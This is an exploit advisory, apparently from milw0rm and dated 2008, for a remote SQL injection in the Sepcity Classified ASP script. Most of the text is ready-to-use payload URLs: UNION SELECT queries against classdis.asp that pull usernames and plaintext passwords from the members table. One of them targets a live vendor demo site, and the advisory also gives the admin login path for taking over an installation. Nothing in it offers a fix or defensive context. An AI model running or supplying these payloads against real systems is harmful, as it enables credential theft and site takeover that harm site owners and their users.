33 lines
No EOL
1.7 KiB
Text
33 lines
No EOL
1.7 KiB
Text
--==+================================================================================+==--
|
|
--==+ Sepcity Classified Remote SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
AUTHOR: S.W.A.T. - Www.BaTLaGH.coM - svvateam@yahoo.com
|
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
Site: http://www.sepcity.com/free_classified_software.aspx
|
|
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
DORK (google): :(
|
|
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
DESCRIPTION:
|
|
You Can See Admin User & Password In Plaintext
|
|
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
EXPLOITS:
|
|
for username:
|
|
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,username,3%20from%20members
|
|
|
|
for password:
|
|
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,password,3%20from%20members
|
|
|
|
Online Demo:
|
|
http://freeasp.sepcity.com/classifieds/classdis.asp?ID=1%20union%20select%200,1,2,3%20from%20members
|
|
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
NOTE/TIP:
|
|
Admin Login Is At http://site.com/[path]/admclassifieds.asp
|
|
I'll Be A C I D A L !!!
|
|
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Sepcity Classified Remote SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-12-29] |